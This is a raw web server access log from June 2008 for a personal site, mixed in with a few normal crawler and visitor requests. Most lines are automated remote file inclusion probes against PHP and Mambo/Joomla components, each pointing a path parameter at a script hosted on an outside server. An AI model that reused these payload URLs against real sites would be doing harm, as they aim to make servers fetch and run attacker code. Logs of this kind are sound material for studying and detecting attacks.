66.230.197.245 - - [08/Jun/2008:10:20:57 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [08/Jun/2008:10:20:57 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.249.67.79 - - [08/Jun/2008:10:21:01 -0700] "GET /blog/index.php/2008/06/ HTTP/1.1" 200 10513 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
87.230.10.251 - - [08/Jun/2008:10:21:02 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.10.251 - - [08/Jun/2008:10:21:03 -0700] "GET //skin/zero_vote/error.php?dir=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:21:04 -0700] "GET /logs/access_080129.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:21:04 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:21:05 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:21:05 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.114.58 - - [08/Jun/2008:10:21:39 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [08/Jun/2008:10:21:42 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
198.66.208.215 - - [08/Jun/2008:10:21:55 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:10:22:49 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:10:22:55 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:10:22:55 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:10:22:56 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:23:23 -0700] "GET /logs/access_080312.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:23:27 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.66.208.215 - - [08/Jun/2008:10:23:55 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.208.215 - - [08/Jun/2008:10:23:55 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.208.215 - - [08/Jun/2008:10:23:56 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:10:24:03 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:10:24:03 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:10:24:04 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.66.208.215 - - [08/Jun/2008:10:24:23 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.137.18 - - [08/Jun/2008:10:24:35 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.trobur.no/media/bbs?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:10:24:48 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:10:25:08 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:10:25:08 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:10:25:09 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.181.74 - - [08/Jun/2008:10:25:55 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://municoinco.cl/weba/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [08/Jun/2008:10:25:56 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://municoinco.cl/weba/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [08/Jun/2008:10:25:56 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://municoinco.cl/weba/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.98.71 - - [08/Jun/2008:10:26:12 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [08/Jun/2008:10:26:13 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:10:26:13 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:10:26:13 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:10:26:21 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:10:26:21 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:10:26:21 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.37.180 - - [08/Jun/2008:10:26:22 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 1121402 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.181.74 - - [08/Jun/2008:10:26:22 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://municoinco.cl/weba/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:10:26:45 -0700] "GET /logs/index2.php?showpage=http://www.ympakt.com/Dust_/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:10:26:46 -0700] "GET /index2.php?showpage=http://www.ympakt.com/Dust_/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
198.66.208.215 - - [08/Jun/2008:10:26:55 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.208.215 - - [08/Jun/2008:10:26:55 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.157.30.8 - - [08/Jun/2008:10:27:01 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cmd.htm????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.157.30.8 - - [08/Jun/2008:10:27:01 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cmd.htm????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.157.30.8 - - [08/Jun/2008:10:27:02 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cmd.htm????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.237.236.11 - - [08/Jun/2008:10:27:46 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
87.106.101.24 - - [08/Jun/2008:10:28:05 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [08/Jun/2008:10:28:06 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.205.17 - - [08/Jun/2008:10:28:11 -0700] "GET /logs/access.log/dbase.php?action=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [08/Jun/2008:10:28:11 -0700] "GET /dbase.php?action=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [08/Jun/2008:10:28:11 -0700] "GET /logs/dbase.php?action=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.101.24 - - [08/Jun/2008:10:28:16 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [08/Jun/2008:10:28:17 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.30.8 - - [08/Jun/2008:10:28:26 -0700] "GET /logs/access_080310.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cmd.htm????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:28:35 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:28:36 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:28:36 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:10:28:50 -0700] "GET /logs/index.php?option=com_acctexp&Itemid=&mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../test2.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:10:28:56 -0700] "GET /index.php?option=com_acctexp&Itemid=&mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../test2.txt? HTTP/1.1" 200 16949 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:28:56 -0700] "GET /logs/access_080220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:28:57 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.111.11.7 - - [08/Jun/2008:10:28:57 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:29:02 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:29:05 -0700] "GET /logs/access_080103.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:29:05 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:29:05 -0700] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:29:08 -0700] "GET /logs/access_080129.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:29:08 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:29:08 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.160.45 - - [08/Jun/2008:10:29:10 -0700] "GET /logs/access_080103.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.160.45 - - [08/Jun/2008:10:29:10 -0700] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.160.45 - - [08/Jun/2008:10:29:10 -0700] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.160.45 - - [08/Jun/2008:10:29:13 -0700] "GET /logs/access_080129.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.185.183 - - [08/Jun/2008:10:29:29 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.246.185.183 - - [08/Jun/2008:10:29:29 -0700] "GET //skin/zero_vote/error.php?dir=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
143.107.137.222 - - [08/Jun/2008:10:29:32 -0700] "GET /logs/access_071230.log/index.php?p=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:29:44 -0700] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:29:44 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:29:44 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:29:48 -0700] "GET /logs/access_080114.log//myspeach/jscript.php?my_ms[root]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:29:49 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:29:49 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:30:01 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:10:30:12 -0700] "GET /logs/access_080216.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.patrioticusa.us/poll/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:10:30:12 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.patrioticusa.us/poll/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:10:30:13 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.patrioticusa.us/poll/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:30:16 -0700] "GET /bikes/dteel/2008-05-30/IMG_4646M.JPG HTTP/1.1" 200 64790 "http://www.st-owners.com/forums/showthread.php?t=42196" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "www.dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:30:16 -0700] "GET /bikes/dteel/2008-05-30/IMG_4644M.JPG HTTP/1.1" 200 108854 "http://www.st-owners.com/forums/showthread.php?t=42196" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "www.dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:30:16 -0700] "GET /bikes/dteel/2008-05-30/IMG_4639M.JPG HTTP/1.1" 200 98013 "http://www.st-owners.com/forums/showthread.php?t=42196" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "www.dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:30:16 -0700] "GET /bikes/dteel/2008-05-30/IMG_4636M.JPG HTTP/1.1" 200 190488 "http://www.st-owners.com/forums/showthread.php?t=42196" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:30:26 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:30:26 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:30:30 -0700] "GET /logs/access_080122.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:30:34 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:10:30:44 -0700] "GET /logs/inc/formmail.inc.php?script_root=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:10:30:44 -0700] "GET /inc/formmail.inc.php?script_root=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.57.142.40 - - [08/Jun/2008:10:30:51 -0700] "GET /logs/inc/formmail.inc.php?script_root=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.142.40 - - [08/Jun/2008:10:30:51 -0700] "GET /inc/formmail.inc.php?script_root=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.79.246.200 - - [08/Jun/2008:10:31:03 -0700] "GET /logs/dbase.php?action=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [08/Jun/2008:10:31:03 -0700] "GET /logs/dbase.php?action=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [08/Jun/2008:10:31:04 -0700] "GET /dbase.php?action=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [08/Jun/2008:10:31:04 -0700] "GET /dbase.php?action=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [08/Jun/2008:10:31:04 -0700] "GET /logs/dbase.php?action=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [08/Jun/2008:10:31:05 -0700] "GET /dbase.php?action=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:07 -0700] "GET / HTTP/1.1" 200 16669 "http://www.st-owners.com/forums/showthread.php?t=42196" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "www.dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:07 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
